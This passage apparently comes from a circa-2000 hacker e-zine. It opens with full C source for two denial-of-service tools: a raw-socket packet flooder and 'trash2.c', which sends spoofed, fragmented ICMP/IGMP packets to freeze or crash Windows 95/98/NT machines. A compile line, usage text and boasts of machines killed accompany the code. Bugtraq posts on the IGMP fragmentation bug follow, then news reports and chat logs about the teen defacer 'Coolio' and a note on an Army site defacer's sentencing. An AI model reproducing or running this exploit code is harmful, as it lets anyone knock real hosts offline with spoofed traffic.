        } else if (!strcmp(argv[y], "-t")) {
         y++;
         hits = atoi (argv[y]);
        }
       }
      }
      
      int main (int argc, char *argv[])
      {
       struct sockaddr_in sin;
       struct hostent *he;
       size_t maxpkt = 15000;
       char *target;
       char buf[15000];
       int sd;
      
       if (argc < 2)
        usage (argv[0]);
       parse_args (argc, argv, &target);
       if ((he = gethostbyname (target)) == NULL) {
        herror (target);
        exit (1);
       }
       memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
      
       sin.sin_family = AF_INET;
       sin.sin_port = htons (port);
      
       if ((sd = socket (AF_INET, SOCK_RAW, 2)) == -1) {
        perror ("error: socket()");
        exit (1);
       }
       if (-1 == connect (sd, (struct sockaddr *)&sin, sizeof (sin))) {
        perror ("error: connect()");
        close (sd);
        exit (1);
       }
       puts ("Determining max MSGSIZE");
       while (send (sd, buf, maxpkt, 0) == -1) {
        if (EMSGSIZE != errno) {
         perror ("error: send()");
         close (sd);
         exit (1);
        }
        maxpkt -= 1;
       }
       hits--;
       printf ("Max MSGSIZE is %d\n..%d bytes [%s:%d]..\n", maxpkt,
         maxpkt, target, port);
       while (hits--) {
        usleep (50000);
        if (send (sd, buf, maxpkt, 0) == -1) {
         perror ("error: send()");
         close (sd);
         exit (1);
        }
        printf ("..%d bytes [%s:%d]..\n", maxpkt, target, port);
       }
       sleep (1);
       close (sd);
       puts ("complete.");
      
       exit (0);
      }
      
      
      -=-
      
      trash2.c - updated and nastier attack
      
      /* Complex denial of service attack against Windows98/95/2000/NT Machines
         Overview: sends random, spoofed, ICMP/IGMP packets with random spoof source
         Result: Freezes the users machine or a CPU usage will rise to extreme
         lag. tested on:
              2.0.35
              2.2.5-15
              2.2.9
              2.0.36
        From a 56k I killed 2/5 Win/NT Box's, 5/5 Win98, 4/6 Win95.
        And those who didn't die, they where lagged to hell...
        You may freely alter this code, but give credit where credit is due 
              gcc -o trash2 trash2.c will do fine...
              e-mail leet@ibw.com.ni for any questions. 
      */
      /* greets go out to:
                  bombfirst, L^Warrior, codesearc, Asphyx, killtron, ^S|lver, randip(); fucntion stolen from kox.c
              acidspill, glock24, p0larbear, xjust, bxj2k, JUSTaGIRL [you know who you are]
              Drth_Maul,everyone in #bitchx@unet, #outlaw@unet, #slackware@unet, #kernel@unet
                                         [outlaw]
      
      */
              
      #include <stdio.h>
      #include <unistd.h>
      #include <stdlib.h>
      #include <string.h>
      #include <sys/types.h>
      #include <sys/time.h>
      #include <sys/socket.h>
      #include <pwd.h>
      #include <time.h>
      #include <sys/utsname.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <netinet/ip.h>
      #include <netinet/ip_icmp.h>
      #include <netinet/igmp.h>
      
      void banner(void) {
              
         printf("trash2.c - misteri0@unet [outlaw]\n\n");
         printf("\n\n");
      }
      void usage(const char *progname) {
         printf("usage:\n");
         printf("./trash  [dst_ip] [# of packets]\n",progname);
         printf("\t[*] [ip_dst] :  ex: 201.12.3.76\n");
         printf("\t[*] [number]  : 100\n");
         printf("\t-----------------------------------------\n");
      }
      unsigned int randip()
      {
              struct hostent *he;
              struct sockaddr_in sin;
              char *buf = (char *)calloc(1, sizeof(char) * 16);
      
              sprintf(buf, "%d.%d.%d.%d",
                      (random()%191)+23,
                      (random()%253)+1,
                      (random()%253)+1,
                      (random()%253)+1); 
      
              inet_aton(buf, (struct in_addr *)&sin);
              return sin.sin_addr.s_addr;
      }
      int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
         struct hostent *host;
         memset(addr,0,sizeof(struct sockaddr_in));
         addr->sin_family = AF_INET;
         addr->sin_addr.s_addr = inet_addr(name);
         if (addr->sin_addr.s_addr == -1) {
            if (( host = gethostbyname(name) ) == NULL )  {
               fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
               return(-1);
            }
            addr->sin_family = host->h_addrtype;
            memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
         }
         addr->sin_port = htons(port);
         return(0);
      }
      unsigned short in_cksum(addr, len)
          u_short *addr;
          int len;
      {
          register int nleft = len;
          register u_short *w = addr;
          register int sum = 0;
          u_short answer = 0;
      
          while (nleft > 1)  {
              sum += *w++;
              nleft -= 2;
          }
      
          if (nleft == 1) {
              *(u_char *)(&answer) = *(u_char *)w ;
              sum += answer;
          }
      
          sum = (sum >> 16) + (sum & 0xffff);
          sum += (sum >> 16);                 
          answer = ~sum;                      
          return(answer);
      }
      int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof)
      {
              int BIGIGMP = 1500;
              unsigned char *pkt;
              struct iphdr *ip;
              struct igmphdr *igmp;
              struct utsname *un;
              struct passwd *p;
      
              int i, s;
              int id = (random() % 40000) + 500;
      
      
              pkt = (unsigned char *)calloc(1, BIGIGMP);
      
              ip = (struct iphdr *)pkt;
              igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));
      
              ip->version = 4;
              ip->ihl = (sizeof *ip) / 4;
              ip->ttl = 255;
              ip->tot_len = htons(BIGIGMP);
              ip->protocol = IPPROTO_IGMP;
              ip->id = htons(id);
              ip->frag_off = htons(IP_MF);
              ip->saddr = spoof;
              ip->daddr = victim->sin_addr.s_addr;
              ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
      
              igmp->type = 0;
              igmp->group = 0;
              igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));
      
              for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
                  i < BIGIGMP; i++)
                      pkt[i] = random() % 255;
      #ifndef I_GROK
              un = (struct utsname *)(pkt + sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 40);
              uname(un);
              p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
              memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
      #endif
              if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                      perror("error: socket()");
                      return 1;
              }
      
              if(sendto(s, pkt, BIGIGMP, 0, victim,
                 sizeof(struct sockaddr_in)) == -1) { 
                      perror("error: sendto()");
                      return 1;
              }
              /* usleep(1000000); */
      
              for(i = 1; i < 5; i++) {
                      if(i > 3)
                              ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
                      else
                              ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
                      sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
                     /* usleep(2000000); */
              }
      
              free(pkt);
              close(s);
              return 0;
      }
      
      int send_winbomb(int socket,
                       unsigned long spoof_addr,
                       struct sockaddr_in *dest_addr) {
         unsigned char  *packet;
         struct iphdr   *ip;
         struct icmphdr *icmp;
         int rc;
      
         packet = (unsigned char *)malloc(sizeof(struct iphdr) +
                                          sizeof(struct icmphdr) + 8);
         ip = (struct iphdr *)packet;
         icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
         memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
         ip->ihl      = 5;
         ip->version  = 4;
      // ip->tos      = 2;
         ip->id       = htons(1234);
         ip->frag_off |= htons(0x2000);
      // ip->tot_len  = 0;
         ip->ttl      = 30;
         ip->protocol = IPPROTO_ICMP;
         ip->saddr    = spoof_addr;
         ip->daddr    = dest_addr->sin_addr.s_addr;
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
      
         icmp->type              = rand() % 15;
         icmp->code              = rand() % 15;
         icmp->checksum          = in_cksum(icmp,sizeof(struct icmphdr) + 1);
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct icmphdr) + 1,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
         ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
         ip->frag_off = htons(8 >> 3);
         ip->frag_off |= htons(0x2000);
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
         icmp->type = rand() % 15;
         icmp->code = rand() % 15;
         icmp->checksum = 0;
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct icmphdr) + 8,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
         free(packet);
         return(0);
      }
      int send_igmp(int socket,
                       unsigned long spoof_addr,
                       struct sockaddr_in *dest_addr) {
         
         unsigned char  *packet;
         struct iphdr   *ip;
         struct igmphdr *igmp;
         int rc;
               
             
         packet = (unsigned char *)malloc(sizeof(struct iphdr) +
                                          sizeof(struct igmphdr) + 8);   
          
         ip = (struct iphdr *)packet;
         igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
         
         memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
      
         ip->ihl      = 5;
         ip->version  = 4;
         ip->id       = htons(34717);
         ip->frag_off = htons(0x2000);
         ip->ttl      = 255;
         ip->protocol = IPPROTO_IGMP;
         ip->saddr    = spoof_addr;  
         ip->daddr    = dest_addr->sin_addr.s_addr;
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
      
          
         igmp->type              = 8;
         igmp->code              = 0;
           
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 1,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
          
      
         ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
         ip->frag_off = htons(8 >> 3);
         ip->version  = 4;
         ip->id       = htons(34717);
         ip->frag_off |= htons(0x2000);
         ip->ttl      = 255;
         ip->protocol = IPPROTO_IGMP;
         ip->saddr    = spoof_addr;
         ip->daddr    = dest_addr->sin_addr.s_addr;
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
      
         
         igmp->type              = 8;
         igmp->code              = 0;
               
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 1,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
         
      
         ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
         ip->frag_off = htons(8 >> 3);
         ip->frag_off |= htons(0x2000);
         ip->check    = in_cksum(ip, sizeof(struct iphdr));
         
         igmp->type = 0;
         igmp->code = 0;
         
         if (sendto(socket,
                    packet,
                    sizeof(struct iphdr) +
                    sizeof(struct igmphdr) + 8,0,
                    (struct sockaddr *)dest_addr,
                    sizeof(struct sockaddr)) == -1) { return(-1); }
           
         free(packet);
         return(0);
                    
      }
      
      int main(int argc, char **argv) {
         struct sockaddr_in dest_addr;
         unsigned int i,sock;
         unsigned long src_addr;
         banner();
         if ((argc != 3)) {
            usage(argv[0]);
            return(-1);
         }
      
         if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
            fprintf(stderr,"ERROR: Opening raw socket.\n");
            return(-1);
         }
      
        /*  if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */
         src_addr = dest_addr.sin_addr.s_addr;
         if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
         printf("Status: Connected....packets sent.\n",argv[0]);
         for (i = 0;i < atoi(argv[2]);i++) {
            if (send_winbomb(sock,randip(),&dest_addr) == -1 || send_igmp(sock,randip(),&dest_addr) == -1 || sendwin98bug(&dest_addr, randip()) ) {
               fprintf(stderr,"ERROR: Unable to Connect To host.\n");
               return(-1);
            }
            usleep(10000);
         }
      }
      
      
      
      -=-
      
      
      Background Info:
      
      
      
      Re: IGMP fragmentation bug
      
      Aleph One (aleph1@SECURITYFOCUS.COM)
      Tue, 13 Jul 1999 00:13:47 -0700 
      
      Summary of the responses to this query. It seems the vulnerability can't
      be reproduces reliably in all instances. Try running the exploits
      for several minutes. Successful results have been obtained across a LAN
      as well as over the Internet. The result can vary from rebooting
      the machine, blue screen of death or killing networking.
      
      Several exploits have been produced, including kod, kox, pimp, moyari13,
      misfrag, faux and bengay. If you can't reproduce the vulnerability with
      one try another. All version of Windows 95 and 98 are believed to be
      vulnerable (standard, OEM, SE, other languages).
      
      The are reports of Windows 200 Advance Server Beta 3, Professional Beta 3
      and Server Beta 3 being vulnerable. The are mixed reports of Windows 2000
      build 2000 being vulnerable. The is at least one report that Windows 2000
      build 2070 is not vulnerable. At least one report claims that Windows NT 4.0
      SP4 is vulnerable but others have reported otherwise.
      
      --
      Elias Levy
      Security Focus
      http://www.securityfocus.com/

      
      -=-
      

      Re: Patch for w98/igmp frag bug (alias kod) and ICMP-type 13 (aliasmoyari) DoS. Where?
      
      
      
           To: BUGTRAQ@SECURITYFOCUS.COM 
           Subject: Re: Patch for w98/igmp frag bug (alias kod) and ICMP-type 13 (aliasmoyari) DoS. Where? 
           From: R a v e N <barakirs@NETVISION.NET.IL> 
           Date: Sat, 28 Aug 1999 19:48:59 +0300 
           Approved-By: aleph1@SECURITYFOCUS.COM 
           Delivered-To: bugtraq@securityfocus.com 
           References: <37ce1592.7548193@tom.us.es> 
           Reply-To: barakirs@netvision.net.il 
           Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> 
      
      
      
      Microsoft didn't release a working* patch against the IGMP headers attack
      yet. It usually takes them a couple of months to release a patch against a
      DoS attack.
      I personally don't like the idea that even the dumbest script kiddie in
      the world could DoS me when I use Windows to connect to the Internet and
      run applications I don't have under Linux (I hate emulators and they hate
      me. We never get along. lol).
      Anyway, about that "downloader" you've mentioned: many products, whether
      they are freeware or shareware, come as some kind of a "downloader". I
      don't think Microsoft wants you to run this program in order to obtain
      information about your computer. They have other ways...
      
      * I said working because I saw some kind of an "experimental fix" (that's
      how they called it) on M$'s website once. I tried it and it didn't work at
      all (I tried all of the .c sources. kod.c, kox.c, fawx.c and that other
      one, whatever it's name is. Some of them worked, some didn't. But the
      point is that some of them worked.
      I tried finding a URL for you guys on M$'s little webserver... no luck. It
      seemed to have disappeared. So much for "experimental fixes"...
      
      Roman Medina-Heigl Hernandez wrote:
      
      > {Sorry if this is known... Aleph, feel free to discard this message.}
      >
      >  I've been looking for a M$ *w98* patch for these DoS bugs and I've
      > found nothing. I visited M$ web, used the site' search engine (tried
      > keywords like "kod", "igmp", etc), viewed w98 support section,
      > security bulletins, ... with no success. :-(
      >
      >  M$ recommends a patch called "System Update" (included in Service
      > Pack 1), although it says nothing about the related DoS. Same occurs
      > with SP1 (for w98). Do they fix the problem? At least it seems not to
      > be documented.
      >
      >  I also want to show my unconformity with M$ policy about w98 SP. You
      > are forced to download an updater program in order to be able to
      > download SP (the alternative method is paying some $$ for ordering a
      > cd). Why do I need such a program? (I do not want to give the chance
      > to send info about my machine to M$...). Most of w98 users are usually
      > referred as dumb users, but I don't think they cannot use a patch in
      > .exe form (like NT Service Packs). Don't you think so, Bill? ;-)
      >
      >  Yours, Romn.
      >
      > ------ E.T.S. Ingenieros Telecomunicacion ---------
      > ---\\     Roman Medina-Heigl Hernandez        //---
      > ---//       E-Mail:  roman@esi.us.es          \\---
      > ------- URL: http://www.esi.us.es/~roman ----------
      
      --
      It took the computing power of three Commodore 64 computers to fly to the
      moon.
      It takes a 486 66MHZ computer to run Windows 95. Anything wrong?
      
      http://blacksun.jemix.com
      
      
      
      
      @HWA
      
116.0 HNN:Mar 3rd:Coolio Charged With Defacement 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      The LAPD Computer Crimes Unit plans to charge a
      17-year-old New Hampshire resident in connection with
      defacing the Dare.org Web site. 'Coolio' has also
      admitted to defacing RAS.com and several other sites.
      The FBI is also investigating him concerning any
      involvement he may have had with DDoS attacks. He
      will be charged with unauthorized access to a computer
      and felony vandalism and would be charged as a
      juvenile. If convicted he could receive a fine of $18,000
      in restitution and possible time in a juvenile facility. If he
      is charged in New Hampshire he could be tried as an
      adult and would face five to 15 years in prison. 

      MSNBC
      http://www.msnbc.com/news/377102.asp
      
      ABC News 
      http://www.abcnews.go.com/sections/tech/DailyNews/webattack000302.html
      
      
      MSNBC;
       
       
      Dennis Moran Jr., a.k.a. 'Coolio,' spoke to NBC News Friday about
      computer hacking.
 
 
      <pic> follow url ... heh
       
      Coolio arrested, denies bringing down major sites
 
 
                                           By Bob Sullivan                                        
                                                    MSNBC
 
      March 8   A New Hampshire teen-ager who had been questioned about last 
      months crippling Internet assault has been arrested on an unrelated 
      charge. Seventeen-year-old Dennis F. Moran is charged with defacing the 
      anti-drug Web site DARE.org. But in an interview with NBC News last week, 
      Moran denied he had any involvement in the string of Web site attacks that 
      last month took down some of the Internets biggest companies.
 
 
      Attrition.org: Coolio's defacements    
      http://www.attrition.org/mirror/attrition/coolio.html
     
     
      DURING AN INTERVIEW with the network, the New Hampshire teen who 
      uses the nickname Coolio on the Net admitted breaking into perhaps 
      100 computers and defacing the DARE.org Web site. He also admitted 
      to two other defacements  RSA.com in February and CWC.gov in 
      November. But he flatly denied any involvement in the Web site 
      attacks that toppled Yahoo, Amazon, eBay and several other major 
      Internet sites. And a federal investigator has told NBCs Pete 
      Williams that government agents are not close to an arrest in those 
      larger Web site attacks and that they are losing interest in 
      Moran as a suspect. The nickname Coolio has circulated in 
      connection with those Web attacks for several weeks, in part 
      because investigators reportedly hold transcripts of chat room 
      conversations that they say are incriminating. Federal 
      investigators searched his home last month and took Morans 
      computers as part of their investigation, according to several 
      MSNBC sources. But Moran told NBC it was all part of a joke that 
      got out of hand  that his Internet friends started a rumor that he 
      had committed those crimes, and then as a joke, he took credit for 
      them. That joke, he said, then became a topic for rabid 
      conversation in an Internet chat room. The conversations were 
      observed by a security expert from Stanford University who sent 
      logs to the FBI, and then he became a suspect, the youth said. 
             
      FACING CHARGES
             Detective Michael Brausam of the LAPD, who
      investigated the DARE.org defacement, told MSNBC that
      Moran admitted to investigators last month that he defaced
      three Web sites, including RSA.com. Moran repeated that
      admission in his interview with NBC.
             The RSA site was hijacked in the middle of the furious
      denial-of-service attacks that rendered useless Yahoo,
      eBay, Amazon and several other major Web sites. But
      Moran denied being a part of those massive
      denial-of-service attacks.
             Moran is not the only suspect in those attacks;
      investigators believe there were at least one and perhaps
      several copycats involved in the flurry of vandalism which
      started Feb. 7 when Yahoo.com went down for about three
      hours.
             MSNBC has learned that investigators executed a
      search warrant at Coolios home last month and confiscated
      all his computers in connection with their investigation of the
      crime.
             With regards to the DARE.org defacement, Brausam
      said Moran would be charged with unauthorized access to a
      computer and vandalism and would be charged as a
      juvenile. That means he faces at least $18,000 in restitution
      and possible time in a juvenile facility.
             He did say he had done denial-of-service attacks
      before and said he had compromised hundreds of
      computers, Brausam said. 
 
      The detective began investigating Coolio after the Dare.org
      attack. Dare.org was hosted by a   Los Angeles ISP at the
      time of the defacement. Brausam traced the attacks to a Web
      site hosted by an Arizona ISP and said he found there a Web
      page that hosted the same images used to deface Dare.org. 
      
             That Web site also hosted programs that enabled
      smurf attacks, the same kind of attack used on Yahoo,
      Brausam said. 
      
             MSNBC has identified two denial-of-service programs
      Coolio adjusted to allow IP spoofing capabilities. 
             The first, called kox, is a modified version of the Kiss
      of Death denial of service program. Coolio took credit for
      the work by signing it and sending it to security mailing lists.
      The e-mail address used on the program maps to the server
      in Arizona where other Coolio files were discovered by
      Brausam. The e-mail also matches an e-mail address
      provided to MSNBC by several Coolio Internet associates.
             The second program, Targa, was described to
      MSNBC by a school-aged friend of Coolios who said
      hed used it once. A member of the #goonies said Coolios
      Targa was a modified version of the Targa written by
      Mixter, a German programmer who has taken credit for
      writing denial-of-service tools. 
 
             After Brausam executed the search warrant at the
      Arizona ISP, he was able to uncover Coolios identity and
      residence in New Hampshire.
             But his investigation stalled there while attempting to get
      the local New Hampshire police department to execute a
      search warrant.
             The same day as the Dare.org defacement, a
      government-run Web site, CWC.gov, was also defaced by
      Coolio, he said in the interview with NBC. That defacement
      included a death threat to the president, so the Secret
      Service became involved in the investigation. 
             The Web site was defaced with the message: If
      prayers do not become mandatory throughout the United
      States, we will detonate our nuclear bombs and your
      President Clinton and his interns will die, according to an
      archive of the attack on attrition.org. 
 
             While Brausam waited for his search warrant, the Web
      site attacks on Yahoo, eBay and the other major Internet
      companies began. Then, on Feb. 12, the RSA.com home
      page was hijacked. 
             Brausam described Coolio as a genius who told
      authorities hed been using computers since he was 3 years
      old and had taken to using the Internet 16 hours a day since
      dropping out of school last year. 
 
      SOURCE: Associated Press
 
 
             Thats consistent with the image of Coolio thats been
      shared by friends and associates MSNBC has interviewed
      during the past few weeks. Hes been described by both
      high school friends and Internet associates as a smart high
      school dropout who regularly gets high by drinking cough
      syrup. MSNBC has also learned that several of his Internet
      associates are cooperating with investigators and have
      fingered Coolio as the culprit in the larger Web page
      attacks.
              
              
      LOGS TELL A STORY
             Some of the logged chat room conversations  which
      Coolio now says are part of an elaborate joke and should
      not be taken seriously  were viewed independently by
      MSNBC.
             Almost immediately after the first attack, MSNBC was
      alerted to the #goonies chat room that the suspect
      frequented and told that Moran was responsible. I think
      its childish and I think he should be stopped, the
      anonymous writer said.
             MSNBC entered the chat anonymously. Coolio,
      unaware he was being observed by a journalist, made
      several comments suggesting he had special knowledge of
      the attacks. 
             In the first excerpt of the chat reproduced below,
      participants are watching CNNs coverage of the hacker
      attacks, often commenting on the reports accuracy and
      inaccuracy. When discussing the attack, far from the false
      boasts typical of hackers trying to take credit for attacks
      they did not perform, Coolio is deliberately coy. He takes
      pains, for example, to refer to the attackers in the third
      person.
             In the log excerpts that follow, all nicknames other than
      Coolios have been altered, but the rest of the statements,
      including typos, are published as they appeared:
             
      [17:33] <Coolio> i dont think the same hackers that did yahoo
                       had anything to do with cnn
      [17:33] <person2> they heard what happened to yahoo yesterday
      [17:33] <person2> so they decided to copy it
      [17:34] <person3> did they have anything to do with amazon.com?
      [17:34] <Coolio> person3, yes they did
      [17:34] <Coolio> since 45 minutes ago
      [17:34] <person3> alright.
      [17:34] <Coolio> tehye switched from ebay to amazon.
             
             But there are several references to Coolio making the
      news, even though that nickname didnt appear in news
      reports until one week later.
             
      [18:24] <person1> hahaha, coolio made ABC world news tonight, 
                        jesus f*ing christ.
      [18:24] <person1> how the f...
      [18:24] <Dr_Coolio> person1, whats ABC world news tonight?
             {excerpt removed}
      [18:24] <person1> Dr_Coolio, ABCs world news television show, every night.
      [18:24] <person3> haha its their network news show coolio
      [18:24] <Dr_Coolio> cool whatd they say
      [18:24] <person2> Coolio what did you do that is getting so much attention
      [18:24] <Dr_Coolio> and did they only talk about yahoo, or buy.com and ebay and amazon too?
             {excerpt deleted}
      [18:29] <person3> haha the zdtv just acknowledged that amazon was down
      [18:29] <Dr_Coolio> on TV?
      [18:29] <Dr_Coolio> awesome!
              
      "oh, my god, coolio is way famous." 
     
      COMMENT IN #GOONIES CHAT ROOM
      
             In this segment, one of Coolios associates begins to
      cross the line, suggesting directly that Coolio is responsible.
      Coolio reacts sharply:
             
      [18:32] <person1> oh, my god, coolio is way famous.
      [18:33] <person1> dude, coolio, sitting at his computer ... disabled 
                        yahoo, and fooled people thinking he was a group of
                        f*ing hackers
      [18:33] <person2> ya no sH**..dont
      [18:33] <person2> heh..
             {excerpt removed}
      [18:33] <person1> how the f... coolio shouldnt be allowed to have this 
                        kind of power.
      [18:33] <Dr_Coolio> SHUT THE F*** UP PERSON1
      [18:33] <Dr_Coolio> SHUT THE F*** UP PERSON1
      [18:33] <person1> hahahahah
             
             The next day, Coolio was still fielding questions in
      #goonies about what he did and didnt do:
             
      [11:58] <person1> did you do all the other ones or were they copycats?
      [11:58] <person2> neck hurts bad
      [11:58] <Dr_Coolio> cnn znd zdnet were copycats
             
             And in this passage, the goonies chuckle about what
      what seems to be an accidentally accurate description of
      Coolio. No reason for real alarm, though, they indicate
      the newscaster is wrong when he describes the suspect as a
      current student:
             
      [12:15] <person1> ahahhahahaha he said 17 year old kid
      [12:15] <Dr_Coolio> person1, WHO DID?
      [12:15] <person2> HAHAHA i wouldnt be suprised if it was a 17 year old kid
      [12:15] <person1> this guy on cnn
      [12:16] <Dr_Coolio> f***
      [12:16] <person3> Dr_Coolio: TURN ON CNN
      [12:16] <Dr_Coolio> kill him
      [12:16] <Dr_Coolio> shut his face up
      [12:16] <person3> a former hacker guy who now works in security
      [12:16] <person2> he said that he goes to school,though
             
             And finally, Coolio corrects the goonies when one slips
      up and forgets to use the third person when referring to the
      hackers as he discusses a television program describing the
      denial of service attacks as a trivial programming feat:
             
      [12:18] <person1> ahahah this guy on cnn..
      [12:19] <person2> man these dudes are sayin you got no skillz
      [12:19] <Dr_Coolio> not me, you mean the hackers
      
      -=-
      
      
      ABC;


       
     Coolio Admits Hacks
      Teen Hacker Tells ABCNEWS He Hacked Three Sites but Denies Major
      Web Attacks 

      Los Angeles police Detective Michael Brausman told ABCNEWS that the
      charges come in connection with the vandalism of the dare.org Web site -
      something Coolio allegedly has admitted to. (Photodisc)
                                                       


      By Brian Ross and Jonathan Dube

      March 2  A 17-year-old hacker who calls
      himself Coolio told ABCNEWS he vandalized
      three Web sites but was not involved in last
      months Web attacks.
           The Los Angeles district attorneys office is expected
      to charge the teen-ager, who lives in New Hampshire,
      with vandalism for defacing at least one of the sites,
      Dare.org, Los Angeles police Detective Michael
      Brausman told ABCNEWS. 
           Coolio, speaking through his father today, admitted to
      ABCNEWS that he hacked Dare.org, CWC.gov and
      RSA.com. His father said Coolio wouldnt comment
      when asked whether he hacked into any other sites. 

      Coolio Denies Web Attacks
      But, in an earlier interview with ABCNEWS, Coolio
      denied any involvement with the denial-of-service attacks
      last month that took down leading Web sites such as
      Yahoo!, Amazaon.com and eBay. 
           I am categorically denying that I had anything to do
      with the Yahoo attack, Coolio told ABCNEWS.   I
      had nothing to do with any of the Web sites that were
      taken down. 
           Coolio says has been using computers since he was 4
      years old and spends about 12 hours a day on the
      Internet. 
           The FBI executed a search warrant at Coolios home
      last month and confiscated several computers. 

      Many Coolios
      Federal authorities tell ABCNEWS they are investigating
      him in connection with the denial-of-service attacks and
      havent ruled him out as a suspect. But they said no
      indictment related to the attacks is imminent. 
           The FBI believes someone who calls himself Coolio
      may have been involved in the attacks because they have
      logs of online chat discussions, which ABCNEWS has
      obtained, in which chatters finger Coolio as the culprit and
      he doesnt deny involvement. But he told ABCNEWS he
      was just joking around with friends in the chats. 
           The investigation has been difficult, in part, because
      many people use the online name Coolio. 
           Last month investigators interviewed another person
      who goes by Coolio in California regarding the
      denial-of-service attacks, and he denied any involvement,
      sources told ABCNEWS. 
           The Coolio in California is believed to be a member of
      Global Hell, a group of teenagers who hacked into
      White House and Department of Defense computer
      systems. 

      Dare.org Attacked
      Los Angeles police began investigating the New
      Hampshire Coolio after an attack in December 1999 on
      Dare.org, an anti-drug abuse site the LAPD founded.
      Detective Brausam of the LAPD Computer Crimes Unit
      traced the origin of the attack to a Web site hosted by an
      Internet service provider in Arizona.
           On Dec. 30, the detective obtained a search warrant
      to raid the service provider and traced the attack back to
      the 17-year-old in New Hampshire. 
           The U.S. Secret Service also linked Coolio to an
      attack on CWC.gov, a Commerce Department site that
      outlines rules for exporting chemicals that could be used to
      produce chemical weapons. 
           On Feb. 13, a few days after the flurry of attacks that
      crippled leading Web sites, RSA Security Inc., an Internet
      security company based in Bedford, Mass., was hacked
      into. A hacker calling himself Coolio redirected visitors
      from RSAs Web site  which proclaims itself the most
      trusted name in e-security  to another hacked
      computer at a university in South America. There, a nearly
      duplicate hoax site proclaimed: RSA Security Inc.
      hacked. Trust us with your data. Praise Allah. Owned by
      Coolio. 

      Prosecutors to Meet
      Federal prosecutors planned to meet with New
      Hampshire prosecutors Friday to discuss charges. 
           One issue to be ironed out is where he will be
      prosecuted and whether Coolio will be charged as an
      adult or a juvenile, L.A. police officer Guillermo Campos
      said. In California, a 17-year-old would be prosecuted as
      a juvenile, but in New Hampshire someone that age would
      be prosecuted as an adult. 
           If charged in New Hampshire, he would face five to
      15 years in prison. 
           Brausam said Coolio would probably be charged in
      California with unauthorized access to a computer and
      felony vandalism and would be charged as a juvenile. That
      means he faces at least $18,000 in restitution and possible
      time in a juvenile facility. 

      ABCNEWS' Simon Surowicz, ABCNEWS.com's Erica
      Rowell and The Associated Press contributed to this
      report.

      'Coolio' Talks 

      In online chats, Coolios friends attributed the spate of
      denial-of-service attacks to him, and he led them to
      believe he was responsible. But he told ABCNEWS he
      was just joking. Here are excerpts from ABCNEWS
      interview with Coolio and his father: 
           
      ABCNEWS: Would you consider yourself a hacker? 
      COOLIO: Um. (PAUSE) Yes, I would consider myself a
      hacker. 
      ABCNEWS: Did you reply to your friends when they said,
      "Uh, yeah, Coolio did it." 
      COOLIO: Yeah. I joked that I had done it. 
      ABCNEWS: So you actually, in a way, admitted to it? 
      COOLIO: Yes. To my friends. 
      ABCNEWS: You admitted in the chat logs that you had
      taken Yahoo down? 
      COOLIO: To my friends yes. 
      ABCNEWS: And what did you tell them? 
      COOLIO: I was like, "Yeah, I did it." But I was just joking.

      COOLIOS FATHER: Kids. [LAUGHTER] Go on those
      IRC [Internet Relay-Chat] channels, you see a lot of that
      stuff happening. 
      ABCNEWS: They brag? 
      COOLIOS FATHER: They brag and lie about things
      they've never done. [LAUGHTER] Just like boys. And
      boys brag all the time. But they've never done nothing.
      [LAUGHTER] 
      
      @HWA
      
117.0 HNN:Mar 3rd:  US Army Web Attacker Sentenced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Mindphasr (Chad Davis) was sentenced to six months in
      prison, three years of supervised probation, and ordered
      to pay $8,054 in restitution Wednesday for defacing the
      Web site of the U.S. Army. The defacement occurred on
      June 27th of last year. 

      Nando Times
      http://www.techserver.com/noframes/story/0,2294,500175665-500228667-501105423-0,00.html
      (404/expired)
      
